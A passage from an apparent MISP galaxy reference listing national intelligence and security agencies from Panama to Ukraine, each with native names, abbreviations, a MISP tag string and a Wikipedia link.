National Intelligence and Security Service - Servicio Nacional de Inteligencia y Seguridad (SENIS)

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Service (Panama) (page does not exist)"

Table 1897. Table References

Links

https://en.wikipedia.org/w/index.php?title=National_Intelligence_and_Security_Service_(Panama)&action=edit&redlink=1

National Intelligence Organization (Papua New Guinea)

National Intelligence Organization (NIO)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Organization (Papua New Guinea)"

Table 1898. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Organization_(Papua_New_Guinea)

National Directorate of Intelligence (Peru)

National Directorate of Intelligence - Dirección Nacional de Inteligencia (DINI)

The tag is: misp-galaxy:intelligence-agency="National Directorate of Intelligence (Peru)"

Table 1899. Table References

Links

https://en.wikipedia.org/wiki/National_Directorate_of_Intelligence_(Peru)

National Intelligence Coordinating Agency

National Intelligence Coordinating Agency (NICA) – Pambansang Ahensiya sa Ugnayang Intelihensiya

The tag is: misp-galaxy:intelligence-agency="National Intelligence Coordinating Agency"

National Intelligence Coordinating Agency is also known as:

  • Pambansang Ahensiya sa Ugnayang Intelihensiya

Table 1900. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Coordinating_Agency

National Bureau of Investigation (Philippines)

National Bureau of Investigation (NBI) – Pambansang Kawanihan ng Pagsisiyasat

The tag is: misp-galaxy:intelligence-agency="National Bureau of Investigation (Philippines)"

National Bureau of Investigation (Philippines) is also known as:

  • Pambansang Kawanihan ng Pagsisiyasat

Table 1901. Table References

Links

https://en.wikipedia.org/wiki/National_Bureau_of_Investigation_(Philippines)

Agencja Wywiadu

Foreign Intelligence Agency - Agencja Wywiadu (AW)

The tag is: misp-galaxy:intelligence-agency="Agencja Wywiadu"

Table 1902. Table References

Links

https://en.wikipedia.org/wiki/Agencja_Wywiadu

Agencja Bezpieczeństwa Wewnętrznego

Internal Security Agency - Agencja Bezpieczeństwa Wewnętrznego (ABW)

The tag is: misp-galaxy:intelligence-agency="Agencja Bezpieczeństwa Wewnętrznego"

Table 1903. Table References

Links

https://en.wikipedia.org/wiki/Agencja_Bezpiecze%C5%84stwa_Wewn%C4%99trznego

Służba Wywiadu Wojskowego (page does not exist)

Military Intelligence Service - Służba Wywiadu Wojskowego (SWW)

The tag is: misp-galaxy:intelligence-agency="Służba Wywiadu Wojskowego (page does not exist)"

Table 1904. Table References

Links

https://en.wikipedia.org/w/index.php?title=S%C5%82u%C5%BCba_Wywiadu_Wojskowego&action=edit&redlink=1

Służba Kontrwywiadu Wojskowego

Military Counter-intelligence Service - Służba Kontrwywiadu Wojskowego (SKW)

The tag is: misp-galaxy:intelligence-agency="Służba Kontrwywiadu Wojskowego"

Table 1905. Table References

Links

https://en.wikipedia.org/wiki/S%C5%82u%C5%BCba_Kontrwywiadu_Wojskowego

Border Guard (Poland)

Operations and Investigations Directorate of the Border Guard Headquarters - Zarząd Operacyjno-Śledczy Komendy Głównej Straży Granicznej (KGSG, ZOŚ, KGSG)

The tag is: misp-galaxy:intelligence-agency="Border Guard (Poland)"

Table 1906. Table References

Links

https://en.wikipedia.org/wiki/Border_Guard_(Poland)

Serviço de Informações de Segurança

Security Intelligence Service - Serviço de Informações de Segurança (SIS)

The tag is: misp-galaxy:intelligence-agency="Serviço de Informações de Segurança"

Table 1907. Table References

Links

https://en.wikipedia.org/wiki/Servi%C3%A7o_de_Informa%C3%A7%C3%B5es_de_Seguran%C3%A7a

Serviço de Informações Estratégicas de Defesa

Defense Strategic Intelligence Service - Serviço de Informações Estratégicas de Defesa (SIED)

The tag is: misp-galaxy:intelligence-agency="Serviço de Informações Estratégicas de Defesa"

Table 1908. Table References

Links

https://en.wikipedia.org/wiki/Servi%C3%A7o_de_Informa%C3%A7%C3%B5es_Estrat%C3%A9gicas_de_Defesa

CISMIL

Military Intelligence and Security Service - Centro de Informações e Segurança Militares (CISMIL)

The tag is: misp-galaxy:intelligence-agency="CISMIL"

Table 1909. Table References

Links

https://en.wikipedia.org/wiki/CISMIL

Qatar State Security

Qatar State Security

The tag is: misp-galaxy:intelligence-agency="Qatar State Security"

Table 1910. Table References

Links

https://en.wikipedia.org/wiki/Qatar_State_Security

Romanian Intelligence Service

Romanian Intelligence Service (SRI) – Serviciul Român de Informații

The tag is: misp-galaxy:intelligence-agency="Romanian Intelligence Service"

Romanian Intelligence Service is also known as:

  • Serviciul Român de Informații

Table 1911. Table References

Links

https://en.wikipedia.org/wiki/Romanian_Intelligence_Service

Foreign Intelligence Service (Romania)

Foreign Intelligence Service (SIE) – Serviciul de Informații Externe

The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service (Romania)"

Foreign Intelligence Service (Romania) is also known as:

  • Serviciul de Informații Externe

Table 1912. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_(Romania)

Serviciul de Telecomunicații Speciale

Special Telecommunication Service (STS) – Serviciul de Telecomunicații Speciale

The tag is: misp-galaxy:intelligence-agency="Serviciul de Telecomunicații Speciale"

Table 1913. Table References

Links

https://en.wikipedia.org/wiki/Serviciul_de_Telecomunica%C8%9Bii_Speciale

Direcția Generală de Informații a Apărării

General Directorate for Defense Intelligence (DGIA) – Direcția Generală de Informații a Apărării

The tag is: misp-galaxy:intelligence-agency="Direcția Generală de Informații a Apărării"

Table 1914. Table References

Links

https://en.wikipedia.org/wiki/Direc%C8%9Bia_General%C4%83_de_Informa%C8%9Bii_a_Ap%C4%83r%C4%83rii

Direcția Generală de Informații și Protecție Internă

General Directorate for Internal Security (DGPI) – Direcția Generală de Protecție Internă

The tag is: misp-galaxy:intelligence-agency="Direcția Generală de Informații și Protecție Internă"

Direcția Generală de Informații și Protecție Internă is also known as:

  • Direcția Generală de Protecție Internă

Table 1915. Table References

Links

https://en.wikipedia.org/wiki/Direc%C8%9Bia_General%C4%83_de_Informa%C8%9Bii_%C8%99i_Protec%C8%9Bie_Intern%C4%83

Federal Security Service (Russia)

Federal Security Service (FSB) – Федеральная служба безопасности

The tag is: misp-galaxy:intelligence-agency="Federal Security Service (Russia)"

Federal Security Service (Russia) is also known as:

  • Федеральная служба безопасности

Table 1916. Table References

Links

https://en.wikipedia.org/wiki/Federal_Security_Service_(Russia)

Main Directorate of Special Programs of the President of the Russian Federation

Main Directorate of Special Programs of the President of the Russian Federation (GUSP) – Главное управление специальных программ Президента Российской Федерации

The tag is: misp-galaxy:intelligence-agency="Main Directorate of Special Programs of the President of the Russian Federation"

Main Directorate of Special Programs of the President of the Russian Federation is also known as:

  • Главное управление специальных программ Президента Российской Федерации

Table 1917. Table References

Links

https://en.wikipedia.org/wiki/Main_Directorate_of_Special_Programs_of_the_President_of_the_Russian_Federation

Foreign Intelligence Service (Russia)

Foreign Intelligence Service (Russia) (SVR) – Служба Внешней Разведки

The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service (Russia)"

Foreign Intelligence Service (Russia) is also known as:

  • Служба Внешней Разведки

Table 1918. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_(Russia)

GRU (Russian Federation)

Main Intelligence Directorate (GRU) – Главное Разведывательное Управление

The tag is: misp-galaxy:intelligence-agency="GRU (Russian Federation)"

GRU (Russian Federation) is also known as:

  • Главное Разведывательное Управление

Table 1919. Table References

Links

https://en.wikipedia.org/wiki/GRU_(Russian_Federation)

Special Communications Service of Russia

Special Communications Service of Russia – Служба специальной связи и информации

The tag is: misp-galaxy:intelligence-agency="Special Communications Service of Russia"

Special Communications Service of Russia is also known as:

  • Служба специальной связи и информации

Table 1920. Table References

Links

https://en.wikipedia.org/wiki/Special_Communications_Service_of_Russia

National Intelligence and Security Service (Rwanda)

National Intelligence and Security Service (Rwanda)

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Service (Rwanda)"

Table 1921. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_and_Security_Service_(Rwanda)

Council of Political and Security Affairs (Saudi Arabia)

Council of Political and Security Affairs (CPSA) – مجلس الشؤون السياسية والأمنية

The tag is: misp-galaxy:intelligence-agency="Council of Political and Security Affairs (Saudi Arabia)"

Table 1922. Table References

Links

https://en.wikipedia.org/wiki/Council_of_Political_and_Security_Affairs_(Saudi_Arabia)

Al Mukhabarat Al A’amah

General Intelligence Presidency (GIP) – رئاسة الاستخبارات العامة

The tag is: misp-galaxy:intelligence-agency="Al Mukhabarat Al A’amah"

Table 1923. Table References

Links

https://en.wikipedia.org/wiki/Al_Mukhabarat_Al_A%27amah

Mabahith

Mabahith (GDI) – المباحث العامة

The tag is: misp-galaxy:intelligence-agency="Mabahith"

Table 1924. Table References

Links

https://en.wikipedia.org/wiki/Mabahith

Saudi Arabian Border Guards

Saudi Arabia Border Guards Intelligence Directorate – استخبارات حرس الحدود

The tag is: misp-galaxy:intelligence-agency="Saudi Arabian Border Guards"

Table 1925. Table References

Links

https://en.wikipedia.org/wiki/Saudi_Arabian_Border_Guards

The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني

The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني

The tag is: misp-galaxy:intelligence-agency="The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني"

Table 1926. Table References

Links

https://en.wikipedia.org#cite_note-25

Security Intelligence Agency

Security Intelligence Agency – Безбедносно-информативна агенција (BIA)

The tag is: misp-galaxy:intelligence-agency="Security Intelligence Agency"

Table 1927. Table References

Links

https://en.wikipedia.org/wiki/Security_Intelligence_Agency

Military Security Agency (Serbia)

Military Security Agency – Војнобезбедносна агенција (VBA)

The tag is: misp-galaxy:intelligence-agency="Military Security Agency (Serbia)"

Table 1928. Table References

Links

https://en.wikipedia.org/wiki/Military_Security_Agency_(Serbia)

Vojnoobaveštajna agencija

Military Intelligence Agency – Војнообавештајна агенција (VOA)

The tag is: misp-galaxy:intelligence-agency="Vojnoobaveštajna agencija"

Table 1929. Table References

Links

https://en.wikipedia.org/wiki/Vojnoobave%C5%A1tajna_agencija

Security and Intelligence Division

Security and Intelligence Division (SID)

The tag is: misp-galaxy:intelligence-agency="Security and Intelligence Division"

Table 1930. Table References

Links

https://en.wikipedia.org/wiki/Security_and_Intelligence_Division

Internal Security Department (Singapore)

Internal Security Department (ISD)

The tag is: misp-galaxy:intelligence-agency="Internal Security Department (Singapore)"

Table 1931. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Department_(Singapore)

Slovak Information Service

Slovak Information Service - Slovenská informačná služba (SIS)

The tag is: misp-galaxy:intelligence-agency="Slovak Information Service"

Table 1932. Table References

Links

https://en.wikipedia.org/wiki/Slovak_Information_Service

Vojenské spravodajstvo

Military Intelligence - Vojenské spravodajstvo

The tag is: misp-galaxy:intelligence-agency="Vojenské spravodajstvo"

Table 1933. Table References

Links

https://en.wikipedia.org/wiki/Vojensk%C3%A9_spravodajstvo

National Security Bureau (Slovakia)

National Security Bureau - Národný bezpečnostný úrad (NBÚ)

The tag is: misp-galaxy:intelligence-agency="National Security Bureau (Slovakia)"

Table 1934. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Bureau_(Slovakia)

Slovenska Obveščevalno-Varnostna Agencija

Slovenian Intelligence and Security Agency - Slovenska Obveščevalno-Varnostna Agencija (SOVA)

The tag is: misp-galaxy:intelligence-agency="Slovenska Obveščevalno-Varnostna Agencija"

Table 1935. Table References

Links

https://en.wikipedia.org/wiki/Slovenska_Obve%C5%A1%C4%8Devalno-Varnostna_Agencija

Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]

Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]

The tag is: misp-galaxy:intelligence-agency="Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]"

Table 1936. Table References

Links

https://en.wikipedia.org#cite_note-26

General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]

General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]

The tag is: misp-galaxy:intelligence-agency="General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]"

Table 1937. Table References

Links

https://en.wikipedia.org#cite_note-27

National Intelligence and Security Agency

National Intelligence and Security Agency (NISA)

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Agency"

Table 1938. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_and_Security_Agency

State Security Agency (South Africa)

State Security Agency (SSA)

The tag is: misp-galaxy:intelligence-agency="State Security Agency (South Africa)"

Table 1939. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Agency_(South_Africa)

South African National Defence Force Intelligence Division

South African National Defence Force, Intelligence Division (SANDF-ID)

The tag is: misp-galaxy:intelligence-agency="South African National Defence Force Intelligence Division"

Table 1940. Table References

Links

https://en.wikipedia.org/wiki/South_African_National_Defence_Force_Intelligence_Division

Crime Intelligence (SAPS)

Crime Intelligence Division, South African Police Service

The tag is: misp-galaxy:intelligence-agency="Crime Intelligence (SAPS)"

Table 1941. Table References

Links

https://en.wikipedia.org/wiki/Crime_Intelligence_(SAPS)

National Intelligence Service (South Korea)

National Intelligence Service (NIS)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (South Korea)"

Table 1942. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(South_Korea)

Defense Intelligence Agency (South Korea)

Defense Intelligence Agency (DIA)

The tag is: misp-galaxy:intelligence-agency="Defense Intelligence Agency (South Korea)"

Table 1943. Table References

Links

https://en.wikipedia.org/wiki/Defense_Intelligence_Agency_(South_Korea)

Defence Intelligence Command (page does not exist)

Defence Intelligence Command (DIC)

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence Command (page does not exist)"

Table 1944. Table References

Links

https://en.wikipedia.org/w/index.php?title=Defence_Intelligence_Command&action=edit&redlink=1

Defense Security Support Command (page does not exist)

Defense Security Support Command (DSSC)

The tag is: misp-galaxy:intelligence-agency="Defense Security Support Command (page does not exist)"

Table 1945. Table References

Links

https://en.wikipedia.org/w/index.php?title=Defense_Security_Support_Command&action=edit&redlink=1

Department of Homeland Security (Spain)

Department of Homeland Security (DSN)

The tag is: misp-galaxy:intelligence-agency="Department of Homeland Security (Spain)"

Table 1946. Table References

Links

https://en.wikipedia.org/wiki/Department_of_Homeland_Security_(Spain)

National Cryptologic Center

National Cryptologic Center - (Centro Criptológico Nacional) (CCN)

The tag is: misp-galaxy:intelligence-agency="National Cryptologic Center"

Table 1947. Table References

Links

https://en.wikipedia.org/wiki/National_Cryptologic_Center

Spanish Armed Forces Intelligence Center

Armed Forces Intelligence Center (CIFAS)

The tag is: misp-galaxy:intelligence-agency="Spanish Armed Forces Intelligence Center"

Table 1948. Table References

Links

https://en.wikipedia.org/wiki/Spanish_Armed_Forces_Intelligence_Center

Joint Cyberspace Command

Joint Cyberspace Command (MCCE)

The tag is: misp-galaxy:intelligence-agency="Joint Cyberspace Command"

Table 1949. Table References

Links

https://en.wikipedia.org/wiki/Joint_Cyberspace_Command

Centro de Inteligencia contra el Terrorismo y el Crimen Organizado

Intelligence Center for Counter-Terrorism and Organized Crime - (Centro de Inteligencia contra el Terrorismo y el Crimen Organizado) (CITCO)

The tag is: misp-galaxy:intelligence-agency="Centro de Inteligencia contra el Terrorismo y el Crimen Organizado"

Table 1950. Table References

Links

https://en.wikipedia.org/wiki/Centro_de_Inteligencia_contra_el_Terrorismo_y_el_Crimen_Organizado

Brigada de Investigación Tecnológica

Technological Research Brigade (BIT)

The tag is: misp-galaxy:intelligence-agency="Brigada de Investigación Tecnológica"

Table 1951. Table References

Links

https://en.wikipedia.org/wiki/Brigada_de_Investigaci%C3%B3n_Tecnol%C3%B3gica

General Commissariat of Information

General Commissariat of Information - (Comisaría General de la Información) (CGI)

The tag is: misp-galaxy:intelligence-agency="General Commissariat of Information"

Table 1952. Table References

Links

https://en.wikipedia.org/wiki/General_Commissariat_of_Information

General Commissariat of Judiciary Police

General Commissariat of Judiciary Police - (Comisaría General de Policía Judicial) (CGPJ)

The tag is: misp-galaxy:intelligence-agency="General Commissariat of Judiciary Police"

Table 1953. Table References

Links

https://en.wikipedia.org/wiki/General_Commissariat_of_Judiciary_Police

State Intelligence Service (Sri Lanka)

State Intelligence Service (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="State Intelligence Service (Sri Lanka)"

Table 1954. Table References

Links

https://en.wikipedia.org/wiki/State_Intelligence_Service_(Sri_Lanka)

Special Branch (Sri Lanka)

Special Branch

The tag is: misp-galaxy:intelligence-agency="Special Branch (Sri Lanka)"

Terrorist Investigation Division

Terrorist Investigation Division

The tag is: misp-galaxy:intelligence-agency="Terrorist Investigation Division"

Criminal Investigation Department (Sri Lanka)

Criminal Investigation Department (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigation Department (Sri Lanka)"

Table 1955. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigation_Department_(Sri_Lanka)

Financial Crimes Investigation Division

Financial Crimes Investigation Division

The tag is: misp-galaxy:intelligence-agency="Financial Crimes Investigation Division"

Table 1956. Table References

Links

https://en.wikipedia.org/wiki/Financial_Crimes_Investigation_Division

Directorate of Military Intelligence (Sri Lanka)

Directorate of Military Intelligence (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="Directorate of Military Intelligence (Sri Lanka)"

Table 1957. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Military_Intelligence_(Sri_Lanka)

Military Intelligence Corps (Sri Lanka)

Military Intelligence Corps (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Corps (Sri Lanka)"

Table 1958. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Corps_(Sri_Lanka)

Department of Naval Intelligence

Department of Naval Intelligence

The tag is: misp-galaxy:intelligence-agency="Department of Naval Intelligence"

Directorate of Air Intelligence

Directorate of Air Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Air Intelligence"

Financial Intelligence Unit (Sri Lanka),

Financial Intelligence Unit (Sri Lanka),

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit (Sri Lanka),"

General Intelligence Service (Sudan)

General Intelligence Service

The tag is: misp-galaxy:intelligence-agency="General Intelligence Service (Sudan)"

Table 1959. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_Service_(Sudan)

Kontoret för särskild inhämtning

Office for Special Acquisition – Kontoret för särskild inhämtning (KSI)

The tag is: misp-galaxy:intelligence-agency="Kontoret för särskild inhämtning"

Table 1960. Table References

Links

https://en.wikipedia.org/wiki/Kontoret_f%C3%B6r_s%C3%A4rskild_inh%C3%A4mtning

National Defence Radio Establishment

National Defence Radio Establishment – Försvarets Radioanstalt (FRA)

The tag is: misp-galaxy:intelligence-agency="National Defence Radio Establishment"

Table 1961. Table References

Links

https://en.wikipedia.org/wiki/National_Defence_Radio_Establishment

Swedish Security Service

Swedish Security Service – Säkerhetspolisen (Säpo)

The tag is: misp-galaxy:intelligence-agency="Swedish Security Service"

Table 1962. Table References

Links

https://en.wikipedia.org/wiki/Swedish_Security_Service

Swiss intelligence agencies

Federal Intelligence Service - Nachrichtendienst des Bundes (NDB)

The tag is: misp-galaxy:intelligence-agency="Swiss intelligence agencies"

Table 1963. Table References

Links

https://en.wikipedia.org/wiki/Swiss_intelligence_agencies

Militärischer Nachrichtendienst

Military Intelligence Service - Militärischer Nachrichtendienst (MND)

The tag is: misp-galaxy:intelligence-agency="Militärischer Nachrichtendienst"

Table 1964. Table References

Links

https://en.wikipedia.org/wiki/Milit%C3%A4rischer_Nachrichtendienst

Air Force Intelligence Directorate

Air Force Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="Air Force Intelligence Directorate"

Table 1965. Table References

Links

https://en.wikipedia.org/wiki/Air_Force_Intelligence_Directorate

General Intelligence Directorate (Syria)

General Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="General Intelligence Directorate (Syria)"

Table 1966. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_Directorate_(Syria)

Political Security Directorate

Political Security Directorate

The tag is: misp-galaxy:intelligence-agency="Political Security Directorate"

Table 1967. Table References

Links

https://en.wikipedia.org/wiki/Political_Security_Directorate

Military Intelligence Directorate (Syria)

Military Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Directorate (Syria)"

Table 1968. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Directorate_(Syria)

National Security Bureau (Republic of China)

National Security Bureau (NSB)

The tag is: misp-galaxy:intelligence-agency="National Security Bureau (Republic of China)"

Table 1969. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Bureau_(Republic_of_China)

Bureau of Investigation (Taiwan)

Investigation Bureau (MJIB)

The tag is: misp-galaxy:intelligence-agency="Bureau of Investigation (Taiwan)"

Table 1970. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_Investigation_(Taiwan)

National Police Agency of the ROC (Taiwan)

National Police Agency (NPA)

The tag is: misp-galaxy:intelligence-agency="National Police Agency of the ROC (Taiwan)"

Table 1971. Table References

Links

https://en.wikipedia.org/wiki/National_Police_Agency_of_the_ROC_(Taiwan)

Republic of China Military Police

Military Police Command (ROCMP)

The tag is: misp-galaxy:intelligence-agency="Republic of China Military Police"

Table 1972. Table References

Links

https://en.wikipedia.org/wiki/Republic_of_China_Military_Police

Bureau of Military Intelligence

Military Intelligence Bureau (MIB)

The tag is: misp-galaxy:intelligence-agency="Bureau of Military Intelligence"

Table 1973. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_Military_Intelligence

State Committee for National Security (Tajikistan)

State Committee for National Security (SCNS) – Кумитаи давлатии амнияти милли (КДАМ)/Государственный комитет национальной безопасности (ГКНБ)

The tag is: misp-galaxy:intelligence-agency="State Committee for National Security (Tajikistan)"

Table 1974. Table References

Links

https://en.wikipedia.org/wiki/State_Committee_for_National_Security_(Tajikistan)

Tanzania Intelligence and Security Service

Tanzania Intelligence and Security Service (TISS)

The tag is: misp-galaxy:intelligence-agency="Tanzania Intelligence and Security Service"

Table 1975. Table References

Links

https://en.wikipedia.org/wiki/Tanzania_Intelligence_and_Security_Service

News Division

News Division

The tag is: misp-galaxy:intelligence-agency="News Division"

Internal Security Affairs Bureau (ISAB)

Internal Security Affairs Bureau (ISAB)

The tag is: misp-galaxy:intelligence-agency="Internal Security Affairs Bureau (ISAB)"

Bureau of Intelligence (BI)

Bureau of Intelligence (BI)

The tag is: misp-galaxy:intelligence-agency="Bureau of Intelligence (BI)"

Intelligence Bureau (IB)

Intelligence Bureau (IB)

The tag is: misp-galaxy:intelligence-agency="Intelligence Bureau (IB)"

Armed Forces Security Center (AFSC)

Armed Forces Security Center (AFSC)

The tag is: misp-galaxy:intelligence-agency="Armed Forces Security Center (AFSC)"

Army Military Intelligence Command (AMIC)

Army Military Intelligence Command (AMIC)

The tag is: misp-galaxy:intelligence-agency="Army Military Intelligence Command (AMIC)"

Department of Border Affair (DBA)

Department of Border Affair (DBA)

The tag is: misp-galaxy:intelligence-agency="Department of Border Affair (DBA)"

Directorate of Joint Intelligence (DJI)

Directorate of Joint Intelligence (DJI)

The tag is: misp-galaxy:intelligence-agency="Directorate of Joint Intelligence (DJI)"

Directorate of Intelligence Royal Thai Army (DINTRTA)

Directorate of Intelligence Royal Thai Army (DINTRTA)

The tag is: misp-galaxy:intelligence-agency="Directorate of Intelligence Royal Thai Army (DINTRTA)"

Directorate of Intelligence, RTAF (INTELLRTAF)

Directorate of Intelligence, RTAF (INTELLRTAF)

The tag is: misp-galaxy:intelligence-agency="Directorate of Intelligence, RTAF (INTELLRTAF)"

Naval Intelligence Department (NID)

Naval Intelligence Department (NID)

The tag is: misp-galaxy:intelligence-agency="Naval Intelligence Department (NID)"

Financial Intelligence Division (FID)

Financial Intelligence Division (FID)

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Division (FID)"

Internal Security Operations Command

Internal Security Operations Command (ISOC)

The tag is: misp-galaxy:intelligence-agency="Internal Security Operations Command"

Table 1976. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Operations_Command

National Intelligence Agency (Thailand)

National Intelligence Agency (NIA)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Agency (Thailand)"

Table 1977. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Agency_(Thailand)

National Intelligence Cooperating Center (NICC)

National Intelligence Cooperating Center (NICC)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Cooperating Center (NICC)"

Drug Intelligence Division (DID)

Drug Intelligence Division (DID)

The tag is: misp-galaxy:intelligence-agency="Drug Intelligence Division (DID)"

Special Branch Bureau

Special Branch Bureau (SBB)

The tag is: misp-galaxy:intelligence-agency="Special Branch Bureau"

Table 1978. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch_Bureau

Strategic Services Agency (SSA)[28]

Strategic Services Agency (SSA)[28]

The tag is: misp-galaxy:intelligence-agency="Strategic Services Agency (SSA)[28]"

Table 1979. Table References

Links

https://en.wikipedia.org#cite_note-28

Organised Crime and Intelligence Unit[30]

Organised Crime and Intelligence Unit[30]

The tag is: misp-galaxy:intelligence-agency="Organised Crime and Intelligence Unit[30]"

Table 1980. Table References

Links

https://en.wikipedia.org#cite_note-30

Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]

Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]"

Table 1981. Table References

Links

https://en.wikipedia.org#cite_note-31

National Intelligence Organization (Turkey)

National Intelligence Organization (MİT)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Organization (Turkey)"

Table 1982. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Organization_(Turkey)

Department of Smuggling, Intelligence, Operations and Information Collection (page does not exist)

Department of Smuggling, Intelligence, Operations and Information Collection (intelligence coordination)

The tag is: misp-galaxy:intelligence-agency="Department of Smuggling, Intelligence, Operations and Information Collection (page does not exist)"

Table 1983. Table References

Links

https://en.wikipedia.org/w/index.php?title=Department_of_Smuggling

Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (page does not exist)

Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (Intelligence Directorate)

The tag is: misp-galaxy:intelligence-agency="Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (page does not exist)"

Table 1984. Table References

Links

https://en.wikipedia.org/w/index.php?title=Emniyet_Genel_M%C3%BCd%C3%BCrl%C3%BC%C4%9F%C3%BC_%C4%B0stihbarat_Ba%C5%9Fkanl%C4%B1%C4%9F%C4%B1&action=edit&redlink=1

Terörle Mücadele Dairesi Başkanlığı(TEM) (page does not exist)

Terörle Mücadele Dairesi Başkanlığı(TEM) (Anti-Terrorism Department)

The tag is: misp-galaxy:intelligence-agency="Terörle Mücadele Dairesi Başkanlığı(TEM) (page does not exist)"

Table 1985. Table References

Links

https://en.wikipedia.org/w/index.php?title=Ter%C3%B6rle_M%C3%BCcadele_Dairesi_Ba%C5%9Fkanl%C4%B1%C4%9F%C4%B1(TEM)&action=edit&redlink=1

Gendarmerie Intelligence Directorate (page does not exist)

Gendarmerie Intelligence Directorate (law enforcement)

The tag is: misp-galaxy:intelligence-agency="Gendarmerie Intelligence Directorate (page does not exist)"

Table 1986. Table References

Links

https://en.wikipedia.org/w/index.php?title=Gendarmerie_Intelligence_Directorate&action=edit&redlink=1

Coast Guard Intelligence Directorate (page does not exist)

Coast Guard Intelligence Directorate (law enforcement)

The tag is: misp-galaxy:intelligence-agency="Coast Guard Intelligence Directorate (page does not exist)"

Table 1987. Table References

Links

https://en.wikipedia.org/w/index.php?title=Coast_Guard_Intelligence_Directorate&action=edit&redlink=1

General Staff Intelligence Directorate (page does not exist)

General Staff Intelligence Directorate (military intelligence)

The tag is: misp-galaxy:intelligence-agency="General Staff Intelligence Directorate (page does not exist)"

Table 1988. Table References

Links

https://en.wikipedia.org/w/index.php?title=General_Staff_Intelligence_Directorate&action=edit&redlink=1

Army Intelligence Department (page does not exist)

Army Intelligence Department (military intelligence)

The tag is: misp-galaxy:intelligence-agency="Army Intelligence Department (page does not exist)"

Table 1989. Table References

Links

https://en.wikipedia.org/w/index.php?title=Army_Intelligence_Department&action=edit&redlink=1

Navy Intelligence Department (page does not exist)

Navy Intelligence Department (military intelligence)

The tag is: misp-galaxy:intelligence-agency="Navy Intelligence Department (page does not exist)"

Table 1990. Table References

Links

https://en.wikipedia.org/w/index.php?title=Navy_Intelligence_Department&action=edit&redlink=1

Air Force Intelligence Department (page does not exist)

Air Force Intelligence Department (military intelligence)

The tag is: misp-galaxy:intelligence-agency="Air Force Intelligence Department (page does not exist)"

Table 1991. Table References

Links

https://en.wikipedia.org/w/index.php?title=Air_Force_Intelligence_Department&action=edit&redlink=1

Ministry for National Security (Turkmenistan)

Ministry for National Security (MNS)

The tag is: misp-galaxy:intelligence-agency="Ministry for National Security (Turkmenistan)"

Table 1992. Table References

Links

https://en.wikipedia.org/wiki/Ministry_for_National_Security_(Turkmenistan)

Chief directorate of intelligence of the Ministry of Defence of Ukraine

Central Intelligence Directorate – Holovne Upravlinnya Rozvidky (HUR)

The tag is: misp-galaxy:intelligence-agency="Chief directorate of intelligence of the Ministry of Defence of Ukraine"

Table 1993. Table References

Links

https://en.wikipedia.org/wiki/Chief_directorate_of_intelligence_of_the_Ministry_of_Defence_of_Ukraine

Foreign Intelligence Service of Ukraine

Foreign Intelligence Service of Ukraine – Sluzhba Zovnishnioyi Rozvidky Ukrayiny (SZR or SZRU)

